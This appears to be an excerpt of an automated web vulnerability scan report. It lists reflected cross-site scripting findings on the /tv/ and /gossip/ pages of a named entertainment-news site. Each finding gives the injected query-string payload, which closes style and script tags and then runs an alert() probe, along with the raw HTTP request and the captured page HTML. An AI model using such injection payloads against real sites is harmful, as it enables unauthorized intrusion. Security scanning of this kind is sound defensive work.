<!-- END HEADER --> <!-- END HEADER --> <link rel="stylesheet" href="/css/contributor/contributor.css" type="text/css" /><style>#left_col { float: left; margin: 0 0 0 5px !important; padding: 0; width: 690px;}</style><!--[if IE 7]><style>.lovethis_storylist ul {list-style-type: none; margin-bottom: 10px; margin-top: 0; padding: 0; width: 140px; position: relative; left: -40px;}</style><![endif]--> <div id="main_content"> <div id="left_col1"> <div id='channel_title_bar' class='jarett_wieselman'> <a href=''><img src='/media/img/channel_page_name_jarett_wieselman.png' style='margin-left: 190px; margin-top: 0px;' alt='' /></a> </div><div class="content_container"> <div class='channelblock leftblock'><a target='_self' href='/fashion/47105_Emily_Blunt_s_Opium_YSL_ad/index.html' class='black_text_link'><img src='/media/photo/2011/12/100422/emily_416.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/fashion/47105_Emily_Blunt_s_Opium_YSL_ad/index.html' class='black_text_link horizontal_excerpt'>Emily Blunt's YSL ad: YES!</a></h4><p>I find Emily Blunt's special brand of charm and charisma to be intoxicating, so it's rather fitting she's now fronting YSL's newest fragrance: Opium.</p><a target='_self' href='/fashion/47105_Emily_Blunt_s_Opium_YSL_ad/index.html' class='channel_more_link'>READ</a></div><div class='clearfix'></div></div><div class='more_from_theinsider_wrapper'><img src='/media/img/contrib_channel_more_news_arrow_jarett_wieselman.jpg' alt='More From The Insider.com' /><ul><li><span class='category_name_small'>gossip</span><a href='/gossip/47165_Idol_Winner_Named_New_Artist_of_the_Year/index.html'>'Idol' Winner Named New Artist of the Year</a></li><li class='more_from_theinsider_separator'><img src='/media/img/3dot_separator.jpg' style='padding-top:10px;' alt='' /></li><li><span class='category_name_small'>gossip</span><a href='/gossip/47164_Robert_Downey_Jr_s_Having_a/index.html'>Robert Downey Jr.'s Having a ... </a></li></ul></div><div class='clearfix'></div><div class='channelblock rightblock'><a target='_blank' href='http://www.etonline.com/tv/116490_American_Horror_Story_Clip/index.html' class='black_text_link'><img src='/media/photo/2011/10/93400/ahs_416_fx.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_blank' href='http://www.etonline.com/tv/116490_American_Horror_Story_Clip/index.html' class='black_text_link horizontal_excerpt'>Rubber Man Returns! Watch!</a></h4><p></p><a target='_blank' href='http://www.etonline.com/tv/116490_American_Horror_Story_Clip/index.html' class='channel_more_link'>READ</a></div><div class='clearfix'></div></div><div class='more_from_theinsider_wrapper'><img src='/media/img/contrib_channel_more_news_arrow_jarett_wieselman.jpg' alt='More From The Insider.com' /><ul><li><span class='category_name_small'>Full Episode</span><a href='/full_episode/43329_Daily_Full_Episode/index.html'>Watch the Latest Full Episode</a></li><li class='more_from_theinsider_separator'><img src='/media/img/3dot_separator.jpg' style='padding-top:10px;' alt='' /></li><li><span class='category_name_small'>gossip</span><a href='/gossip/39514_What_Happened_in_Vegas_This_Weekend_Pics/index.html'>Celebs Hit Las Vegas [Pics]</a></li></ul></div><div class='clearfix'></div><div class='channelblock leftblock'><a target='_blank' href='http://www.etonline.com/news/116484_Trevor_Project_Red_Carpet/index.html' class='black_text_link'><img src='/media/photo/2011/12/100235/zachary_quinto_416_134864664.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_blank' href='http://www.etonline.com/news/116484_Trevor_Project_Red_Carpet/index.html' class='black_text_link horizontal_excerpt'>Zachary Quinto's Coming Out Party</a></h4><p></p><a target='_blank' href='http://www.etonline.com/news/116484_Trevor_Project_Red_Carpet/index.html' class='channel_more_link'>READ</a></div><div class='clearfix'></div></div><div class='more_from_theinsider_wrapper'><img src='/media/img/contrib_channel_more_news_arrow_jarett_wieselman.jpg' alt='More From The Insider.com' /><ul><li><span cla..
- /tv/index.html

/tv/index.html

http://www.theinsider.com/tv/index.html?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002B2..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0002B2)</script>

Request

GET /tv/index.html?'"--> HTTP/1.1
Referer: http://www.theinsider.com/search/index.html?sort=date-sdate
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=299
Date: Tue, 06 Dec 2011 06:55:05 GMT
Content-Length: 11179
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>TV News | Celebrity Gossip | Entertainment News | Pop Culture | TheInsider | TheInsider.com</title> <meta name="description" content="" /> <meta name="keywords" content="" /> <meta name="category" content="tv" /> <meta name="date" content="2011-10-21 17:42:00" /><meta property="og:title" content="TV News | Celebrity Gossip | Entertainment News | Pop Culture | TheInsider" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/tv/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><meta property="og:description" content="TV News | Celebrity Gossip | Entertainment News | Pop Culture | TheInsider" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="fb:app_id" content="123263397703043"/><PageMap><DataObject type="date"><Attribute name="displaydate" value="2011-10-21 17:42:00" /><Attribute name="sdate" value="20111021" /></DataObject><DataObject type="thumbnail"><Attribute name="src" value="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><Attribute name="width" value="150" /><Attribute name="height" value="150" /></DataObject></PageMap> <link rel="stylesheet" href="/css/main/main.css" type="text/css" /> <link rel="stylesheet" href="/css/nivo-slider/nivo-slider.css" type="text/css" media="screen" /> <link rel="shortcut icon" href="http://www.theinsider.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <script src="http://www.theinsider.com/Scripts/swfobject_modified.js" type="text/javascript"></script> <script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script src="/scripts/jquery.nivo.slider.pack.js" type="text/javascript"></script> <script src="Scripts/swfobject_modified.js" type="text/javascript"></script> <script type="text/javascript">$(document).ready(function() { $('#slider').nivoSlider({ effect:'slideInLeft', // Specify sets like: 'fold,fade,sliceDown' animSpeed:200, // Slide transition speed pauseTime:4000, // How long each slide will show startSlide:0, // Set starting Slide (0 index) directionNav:false, // Next & Prev navigation directionNavHide:true, // Only show on hover controlNav:true, // 1,2,3... navigation controlNavThumbs:true, // Use thumbnails for Control Nav controlNavThumbsFromRel:false, // Use image rel for thumbs controlNavThumbsSearch: '.jpg', // Replace this with... controlNavThumbsReplace: '_thumb.jpg', // ...this in thumb Image src keyboardNav:true, // Use left & right arrows pauseOnHover:true, // Stop animation while hovering manualAdvance:false, // Force manual transitions captionOpacity:1, // Universal caption opacity prevText: 'Prev', // Prev directionNav text nextText: 'Next', // Next directionNav text beforeChange: function(){}, // Triggers before a slide transition afterChange: function(){}, // Triggers after a slide transition slideshowEnd: function(){}, // Triggers after all slides have been shown lastSlide: function(){}, // Triggers when last slide is shown afterLoad: function(){} // Triggers when slider has loaded });});</script><style type='text/css'> .nivo-imageLink img{width:416px; height:234px;}</style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--><link rel="stylesheet" href="http://detect.get.it/lb1/lightbox.css" /> <script> var getit_boxes = [ { id: 'lb1', width: 480, height: 235, noscroll: false, autopop: 'getit' } ]; </script> </head><body class="body"><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--><body class="body"> <!-- TOP LEADERBOARD AD --><div id='leaderboard-top-box'><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/tv;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/tv;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/tv;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div><!-- END TOP LEADERBOARD AD --> <div id="container"> <!-- HEADER --> <!-- HEADER -->
<div id="header">
<!-- LOGO -->
<div id="logo"><a href="/index.html" title="The Insider.com"><span>The Insider.com</span></a></div>
<!-- END LOGO -->

<!-- SEARCH & SOCIAL BOX -->
<div id="header_search_social">

<!-- SOCIAL BOX -->
<div id="social_wrapper">

<a href="http://www.twitter.com/home?status=TV+hub+page+http://insdr.co/nlyRam+via+@theinsider" target="_blank" style="float:left; margin-right: 2px;"><img src="/media/img/header_twitter_icon.jpg" alt="twitter"></a>
<div class="addthis_toolbox addthis_default_style" addthis:url="http://www.theinsider.com" addthis:title="The Insider Homepage">

<a class="addthis_button_stumbleupon"></a>
<a class="addthis_button_facebook_like" fb:like:layout="button_count"></a>
</div>
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4e8e37c800be6a9a"></script>
<!-- AddThis Button END -->
<!-- END SOCIAL BOX -->

<!-- SEARCH BOX -->
<div id="search">
<div id="search_wrapper">
<form action="/search/index.html?sort=date-sdate" id="" method="POST">
<div>
<input type="text" class="searchbox" name="q" value="SEARCH" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}" />
<input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa" />
<input type="hidden" name="hq" value="more:recent4" />
</div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
</div>
</div>
<!-- END SEARCH BOX -->
</div>
<!-- END SEARCH & SOCIAL BOX -->

<!-- NAVIGATION -->
<div id="navbar">
<ul>
<li class="navtab gossip"> <a href="/gossip/index.html">GOSSIP</a> </li>
<li class="navtab tv"> <a href="/tv/index.html">TV</a> </li>
<li class="navtab movies"> <a href="/movies/index.html">MOVIES</a> </li>
<li class="navtab fashion"> <a href="/fashion/index.html">FASHION</a> </li>
<li class="navtab music"> <a href="/music/index.html">MUSIC</a> </li>
<li class="navtab photos"> <a href="/photos/index.html">PHOTOS</a> </li>
<li class="navtab video"> <a href="/video/index.html">VIDEOS</a> </li>
<!-- Date to include TBD <li class="navtab celebs"> <a href="/celebs">CELEBS</a> </li> -->
</ul>
</div>
<!-- END NAVIGATION -->

<div class="clearfix"></div>

<h1>The Insider.com</h1>
</div>

<!-- TRENDING BOX -->
<link rel="stylesheet" href="/css/main/main.css" type="text/css" /><!-- TRENDING BOX --><div id="trending_wrapper"><ul id="trending_list"><li><a href='/gossip/39237_Before_They_Were_Famous/index.html'><img src='/media/photo/2011/12/100371/megan_fox_416_tcanham_124432726.jpg' alt='' width='138' height='70' /></a><a href='/gossip/39237_Before_They_Were_Famous/index.html' class='trending_links'>Before They Were Famous</a></li><li class='dotted_separator'></li><li><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html'><img src='/media/photo/2011/12/100212/craig_416.jpg' alt='' width='138' height='70' /></a><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html' class='trending_links'>Daniel Craig (Swim)Suits Up For 'Skyfall'</a></li><li class='dotted_separator'></li><li><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html'><img src='/media/photo/2011/12/100316/leann_rimes_julianne_hough_416.jpg' alt='' width='138' height='70' /></a><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html' class='trending_links'>The Good, the Bad and the Ugly</a></li><li class='dotted_separator'></li><li><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html'><img src='/media/photo/2011/12/99690/vid_kobe_bryant_416_112759001.jpg' alt='' width='138' height='70' /></a><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html' class='trending_links'>Star Ballers and their Celeb Fans</a></li><li class='dotted_separator'></li></ul></div><!-- END HEADER --> <!-- BREAKING NEWS BOX --> <!-- END BREAKING NEWS BOX -->
<!-- END HEADER --> <!-- END HEADER --> <link rel="stylesheet" href="/css/tv/tv.css" type="text/css" /><!--[if IE 7]><style>.lovethis_storylist ul {list-style-type: none; margin-bottom: 10px; margin-top: 0; padding: 0; width: 140px; position: relative; left: -40px;}</style><![endif]--> <div id="main_content"> <div id="left_col"> <div id="channel_title_bar"> <a href="http://www.theinsider.com/tv/"><img src="/media/img/channel_page_name_v3_tv.png" class="channel_title_logo" alt="" /></a> </div><div class="content_container"> <div class='channelblock leftblock'><a target='_self' href='/tv/47106_Tyra_Banks_on_the_Out_of_This_World_ANTM_Finale/index.html' class='black_text_link'><img src='/media/photo/2011/12/100426/tyra_banks_brooke_anderson_416.jpg' class='channel_vid_img' height='360' width='640' alt='' /></a><div class='vid_title'><h4><a target='_self' href='/tv/47106_Tyra_Banks_on_the_Out_of_This_World_ANTM_Finale/index.html' class='black_text_link'>The 'Out of This World' 'ANTM' Season Finale</a></h4></div><div class='vid_excerpt'><p>One of Hollywood's hardest working stars, Tyra Banks, sat down with <em>The Insider</em>'s Brooke Anderson for a one-on-one chat about the upcoming season finale of <em>America's Next Top Model</em>, changes for the show's next season and her physical imperfections.</p><a target='_self' href='/tv/47106_Tyra_Banks_on_the_Out_of_This_World_ANTM_Finale/index.html' class='channel_more_link'>WATCH VIDEO</a></div><div class='clearfix'></div></div><div class='channelblock rightblock'><a target='_blank' href='http://www.etonline.com/tv/116490_American_Horror_Story_Clip/index.html' class='black_text_link'><img src='/media/photo/2011/10/93400/ahs_416_fx.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_blank' href='http://www.etonline.com/tv/116490_American_Horror_Story_Clip/index.html' class='black_text_link horizontal_excerpt'>Rubber Man Returns! Watch!</a></h4><p></p><a target='_blank' href='http://www.etonline.com/tv/116490_American_Horror_Story_Clip/index.html' class='channel_more_link'>READ</a></div><div class='clearfix'></div></div><div class='channelblock leftblock'><a target='_self' href='/tv/46994_Happy_Endings_Christmas_episode_clip/index.html' class='black_text_link'><img src='/media/photo/2011/12/100127/damon_wayans_416.jpg' class='channel_vid_img' height='360' width='640' alt='' /></a><div class='vid_title'><h4><a target='_self' href='/tv/46994_Happy_Endings_Christmas_episode_clip/index.html' class='black_text_link'>Exclusive 'Happy Endings' Sneak Peek</a></h4></div><div class='vid_excerpt'><p>As an early adapter of <em>Happy Endings</em>, I'm thrilled that season two has not only A) happened and B) been brilliant but C) found an amazingly devoted audience that delights in the ridicu-mazing hijinks that TV's best friends since <em>Friends </em>get into every week.</p><a target='_self' href='/tv/46994_Happy_Endings_Christmas_episode_clip/index.html' class='channel_more_link'>WATCH VIDEO</a></div><div class='clearfix'></div></div><div class='channelblock rightblock'><a target='_self' href='/tv/46985_Kourtney_and_Kim_Take_New_York_Recap_Episode_2/index.html' class='black_text_link'><img src='/media/photo/2011/12/100136/kim_k_e_111205_416.jpg' height='360' width='640' class='channel_vid_img' alt='' /></a><div class='vid_title'><h4><a target='_self' href='/tv/46985_Kourtney_and_Kim_Take_New_York_Recap_Episode_2/index.html' class='black_text_link'>'KKTNY' Recap: Kris & Kim Kompromise</a></h4></div><div class='vid_excerpt'><p>As Kim and Kourtney come to find themselves living separate lives from their significant others, a visit from Khloe sparks a move towards reconciliation for both sisters.</p><a target='_self' href='/tv/46985_Kourtney_and_Kim_Take_New_York_Recap_Episode_2/index.html'class='channel_more_link'>WATCH VIDEO</a></div><div class='clearfix'></div></div><div class='channelblock leftb..
- /gossip/

/gossip/

http://www.theinsider.com/gossip/?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00025F)%3C/s..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00025F)</script>

Request

GET /gossip/?'"--> HTTP/1.1
Referer: http://www.theinsider.com/gossip/index.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 06:54:59 GMT
Content-Length: 10840
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Celebrity Gossip | Entertainment News | Pop Culture | TheInsider | TheInsider.com</title> <meta name="description" content="" /> <meta name="keywords" content="" /> <meta name="category" content="gossip" /> <meta name="date" content="2011-05-26 13:35:00" /><meta property="og:title" content="Celebrity Gossip | Entertainment News | Pop Culture | TheInsider" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/gossip/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><meta property="og:description" content="Celebrity Gossip | Entertainment News | Pop Culture | TheInsider" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="fb:app_id" content="123263397703043"/><PageMap><DataObject type="date"><Attribute name="displaydate" value="2011-05-26 13:35:00" /><Attribute name="sdate" value="20110526" /></DataObject><DataObject type="thumbnail"><Attribute name="src" value="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><Attribute name="width" value="150" /><Attribute name="height" value="150" /></DataObject></PageMap> <link rel="stylesheet" href="/css/main/main.css" type="text/css" /> <link rel="stylesheet" href="/css/nivo-slider/nivo-slider.css" type="text/css" media="screen" /> <link rel="shortcut icon" href="http://www.theinsider.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <script src="http://www.theinsider.com/Scripts/swfobject_modified.js" type="text/javascript"></script> <script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script src="/scripts/jquery.nivo.slider.pack.js" type="text/javascript"></script> <script src="Scripts/swfobject_modified.js" type="text/javascript"></script> <script type="text/javascript">$(document).ready(function() { $('#slider').nivoSlider({ effect:'slideInLeft', // Specify sets like: 'fold,fade,sliceDown' animSpeed:200, // Slide transition speed pauseTime:4000, // How long each slide will show startSlide:0, // Set starting Slide (0 index) directionNav:false, // Next & Prev navigation directionNavHide:true, // Only show on hover controlNav:true, // 1,2,3... navigation controlNavThumbs:true, // Use thumbnails for Control Nav controlNavThumbsFromRel:false, // Use image rel for thumbs controlNavThumbsSearch: '.jpg', // Replace this with... controlNavThumbsReplace: '_thumb.jpg', // ...this in thumb Image src keyboardNav:true, // Use left & right arrows pauseOnHover:true, // Stop animation while hovering manualAdvance:false, // Force manual transitions captionOpacity:1, // Universal caption opacity prevText: 'Prev', // Prev directionNav text nextText: 'Next', // Next directionNav text beforeChange: function(){}, // Triggers before a slide transition afterChange: function(){}, // Triggers after a slide transition slideshowEnd: function(){}, // Triggers after all slides have been shown lastSlide: function(){}, // Triggers when last slide is shown afterLoad: function(){} // Triggers when slider has loaded });});</script><style type='text/css'> .nivo-imageLink img{width:416px; height:234px;}</style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--><link rel="stylesheet" href="http://detect.get.it/lb1/lightbox.css" /> <script> var getit_boxes = [ { id: 'lb1', width: 480, height: 235, noscroll: false, autopop: 'getit' } ]; </script> </head><body class="body"><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--><body class="body"> <!-- TOP LEADERBOARD AD --><div id='leaderboard-top-box'><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/gossip;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/gossip;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/gossip;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div><!-- END TOP LEADERBOARD AD --> <div id="container"> <!-- HEADER --> <!-- HEADER -->
<div id="header">
<!-- LOGO -->
<div id="logo"><a href="/index.html" title="The Insider.com"><span>The Insider.com</span></a></div>
<!-- END LOGO -->

<!-- SEARCH & SOCIAL BOX -->
<div id="header_search_social">

<!-- SOCIAL BOX -->
<div id="social_wrapper">

<a href="http://www.twitter.com/home?status=Gossip+Channel+Page+http://insdr.co/rh3r7q+via+@theinsider" target="_blank" style="float:left; margin-right: 2px;"><img src="/media/img/header_twitter_icon.jpg" alt="twitter"></a>
<div class="addthis_toolbox addthis_default_style" addthis:url="http://www.theinsider.com" addthis:title="The Insider Homepage">

<a class="addthis_button_stumbleupon"></a>
<a class="addthis_button_facebook_like" fb:like:layout="button_count"></a>
</div>
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4e8e37c800be6a9a"></script>
<!-- AddThis Button END -->
<!-- END SOCIAL BOX -->

<!-- SEARCH BOX -->
<div id="search">
<div id="search_wrapper">
<form action="/search/index.html?sort=date-sdate" id="" method="POST">
<div>
<input type="text" class="searchbox" name="q" value="SEARCH" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}" />
<input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa" />
<input type="hidden" name="hq" value="more:recent4" />
</div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
</div>
</div>
<!-- END SEARCH BOX -->
</div>
<!-- END SEARCH & SOCIAL BOX -->

<!-- NAVIGATION -->
<div id="navbar">
<ul>
<li class="navtab gossip"> <a href="/gossip/index.html">GOSSIP</a> </li>
<li class="navtab tv"> <a href="/tv/index.html">TV</a> </li>
<li class="navtab movies"> <a href="/movies/index.html">MOVIES</a> </li>
<li class="navtab fashion"> <a href="/fashion/index.html">FASHION</a> </li>
<li class="navtab music"> <a href="/music/index.html">MUSIC</a> </li>
<li class="navtab photos"> <a href="/photos/index.html">PHOTOS</a> </li>
<li class="navtab video"> <a href="/video/index.html">VIDEOS</a> </li>
<!-- Date to include TBD <li class="navtab celebs"> <a href="/celebs">CELEBS</a> </li> -->
</ul>
</div>
<!-- END NAVIGATION -->

<div class="clearfix"></div>

<h1>The Insider.com</h1>
</div>

<!-- TRENDING BOX -->
<link rel="stylesheet" href="/css/main/main.css" type="text/css" /><!-- TRENDING BOX --><div id="trending_wrapper"><ul id="trending_list"><li><a href='/gossip/39237_Before_They_Were_Famous/index.html'><img src='/media/photo/2011/12/100371/megan_fox_416_tcanham_124432726.jpg' alt='' width='138' height='70' /></a><a href='/gossip/39237_Before_They_Were_Famous/index.html' class='trending_links'>Before They Were Famous</a></li><li class='dotted_separator'></li><li><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html'><img src='/media/photo/2011/12/100212/craig_416.jpg' alt='' width='138' height='70' /></a><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html' class='trending_links'>Daniel Craig (Swim)Suits Up For 'Skyfall'</a></li><li class='dotted_separator'></li><li><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html'><img src='/media/photo/2011/12/100316/leann_rimes_julianne_hough_416.jpg' alt='' width='138' height='70' /></a><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html' class='trending_links'>The Good, the Bad and the Ugly</a></li><li class='dotted_separator'></li><li><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html'><img src='/media/photo/2011/12/99690/vid_kobe_bryant_416_112759001.jpg' alt='' width='138' height='70' /></a><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html' class='trending_links'>Star Ballers and their Celeb Fans</a></li><li class='dotted_separator'></li></ul></div><!-- END HEADER --> <!-- BREAKING NEWS BOX --> <!-- END BREAKING NEWS BOX -->
<!-- END HEADER --> <!-- END HEADER --> <link rel="stylesheet" href="/css/gossip/gossip.css" type="text/css" /><style>#left_col { float: left; margin: 0 0 0 5px !important; padding: 0; width: 690px;}#channel_pagination_bar1 { background-color: #B5BB0F; box-shadow: 0 5px 15px #999999; height: 51px; margin-bottom: 15px; margin-left: -10px !important; width: 700px;}</style><!--[if IE 7]><style>.lovethis_storylist ul {list-style-type: none; margin-bottom: 10px; margin-top: 0; padding: 0; width: 140px; position: relative; left: -40px;}</style><![endif]--> <div id="main_content"> <div id="left_col"> <div id="channel_title_bar"> <a href="http://www.theinsider.com/gossip/"><img src="/media/img/channel_page_name_v3_gossip.png" class="channel_title_logo" alt="" /></a> </div><div class="content_container"> <div class='channelblock leftblock'><a target='_blank' href='http://www.etonline.com/music/116501_Scotty_McCreery_Wins_New_Artist_of_the_Year/index.html' class='black_text_link'><img src='/media/photo/2011/12/100484/scotty_mccreery_416.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_blank' href='http://www.etonline.com/music/116501_Scotty_McCreery_Wins_New_Artist_of_the_Year/index.html' class='black_text_link horizontal_excerpt'>'Idol' Winner Named New Artist of the Year</a></h4><p></p><a target='_blank' href='http://www.etonline.com/music/116501_Scotty_McCreery_Wins_New_Artist_of_the_Year/index.html' class='channel_more_link'>READ</a></div><div class='clearfix'></div></div><div class='channelblock rightblock'><a target='_blank' href='http://www.etonline.com/tv/116499_Robert_Downey_Jr_Reveals_Baby_s_Gender/index.html' class='black_text_link'><img src='/media/photo/2011/12/100480/robert_downey_416.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_blank' href='http://www.etonline.com/tv/116499_Robert_Downey_Jr_Reveals_Baby_s_Gender/index.html' class='black_text_link horizontal_excerpt'>Robert Downey Jr.'s Having a ... </a></h4><p></p><a target='_blank' 